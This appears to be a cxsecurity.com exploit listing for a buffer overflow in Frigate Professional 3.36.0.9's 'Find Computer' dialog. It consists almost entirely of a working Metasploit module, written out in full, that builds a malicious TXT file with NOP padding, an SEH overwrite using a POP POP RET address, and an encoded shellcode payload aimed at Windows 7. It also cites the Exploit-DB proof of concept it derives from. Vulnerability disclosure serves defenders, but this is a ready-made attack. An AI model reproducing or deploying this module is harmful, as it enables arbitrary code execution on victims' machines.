Frigate Professional 3.36.0.9 'Find Computer' Buffer Overflow (Metasploit)

2020-10-16 / 2020-10-15
fr ZwX (FR) fr
Risk: High
Local: Yes
Remote: Yes
CVE: N/A
CWE: N/A

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT include Msf::Exploit::Remote::Seh def initialize(info={}) super(update_info(info, 'Name' => "Frigate Professional 3.36.0.9 'Find Computer' Buffer Overflow", 'Description' => %q{ This module exploits a buffer overflow in Frigate Professional 3.36.0.9. By creating a specially designed TXT file go to "Disk"> "Find Computer" then copy the characters located in the file (.txt) then paste it in the "Computer Name" > "OK button". The application is vulnerable and the buffer is overwritten, allowing the shellcode to be executed. }, 'License' => MSF_LICENSE, 'Author' => [ 'Paras Bhatia', # Exploit-DB POC 'ZwX' # Metasploit Module ], 'References' => [ [ 'EDB', '48579' ], [ 'URL', 'https://www.exploit-db.com/exploits/48579' ], [ 'URL', 'https://cxsecurity.com/issue/WLB-2020060051' ] ], 'Platform' => 'win', 'Targets' => [ [ 'Windows 7 Ultimate SP1 X86 - Windows 7 F.Prenium x64', { 'Ret' => 0x40010C4B } ], # POP POP RET [rtl60.bpl] ], 'Payload' => { 'BadChars' => "\x00\x14\x09\x0a\x0d" }, 'Privileged' => false, 'DisclosureDate' => "Jun 04 2020", 'DefaultTarget' => 0)) register_options( [ OptString.new('FILENAME', [true, 'Create malicious file', 'name.txt']) ]) end def exploit file_payload = payload.encoded msfsploit = make_fast_nops(4112) msfsploit << "\xeb\x20#{Rex::Text.rand_text_alpha(2, payload_badchars)}" # NSEH msfsploit << [target.ret].pack("V*") # SEH msfsploit << "\x90" * 50 msfsploit << file_payload file_create(msfsploit) end end


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top